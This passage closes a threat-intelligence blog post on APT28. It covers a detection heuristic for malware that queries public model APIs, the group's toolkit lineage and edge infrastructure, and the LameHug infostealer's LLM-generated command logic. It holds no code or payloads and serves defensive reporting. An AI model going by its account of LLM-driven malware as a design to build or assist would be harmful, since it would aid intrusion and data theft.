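The detection logic worth taking away is the combination: decoded English that talks about commands and folders, next to an outbound call to a public model API, in a binary that has no business doing either. On the network side the same idea applies: an endpoint process that is not a browser or a known developer tool talking to an inference API is the event to alert on, since the commands themselves are generated only at run time and never appear in the sample.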

Conclusion

Looking back at more than two decades of APT28 activity, what stands out is constant layering of tradecraft. The X-Agent / X-Tunnel stack that defined the intrusion-set between 2004 and 2018 was never fully retired: its code lineage resurfaces today in BeardShell and Slimagent, and its operational logic still drives Operation Phantom Net Voxel. 

What also makes this intrusion-set unique is their physical reach. To our knowledge, APT28 is the only intrusion-set where we see a clear and proven link between remote cyber operations and close access operations (1, 2, 3).

Three shifts mark the recent period:

  • The toolkit has fragmented and re-consolidated in parallel: short-lived single-purpose modules now coexist with a hardened in-house implant chain, and both are used at the same time depending on the target tier.
  • The operational infrastructure has moved to the edge: compromised SOHO devices and legitimate abused cloud-storage now carry the load that rented VPS used to.
  • APT28 is experimenting with LLM-driven command logic in the LameHug infostealer. It is still a proof of concept, but the fact that it was deployed against Ukrainian executive bodies indicates that LLM command logic is no longer a research curiosity.

The TDR team will continue to track APT28 closely, sharing technical findings through public reporting, supporting the wider community with tooling such as RePythonNet, and pursuing collaboration with law enforcement agencies to disrupt the intrusion-set’s operations.

Note: if you believe your research deserves to be referenced in this timeline, feel free to reach out at tdr[at]sekoia.io. Please note that we only consider publications from cybersecurity vendors or government agencies.

Thank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications by clicking here. You can also contact us at tdr[at]sekoia.io for further discussions or future IOCs.



Original article: https://blog.sekoia.io/apt28-an-evolution-of-tradecraft/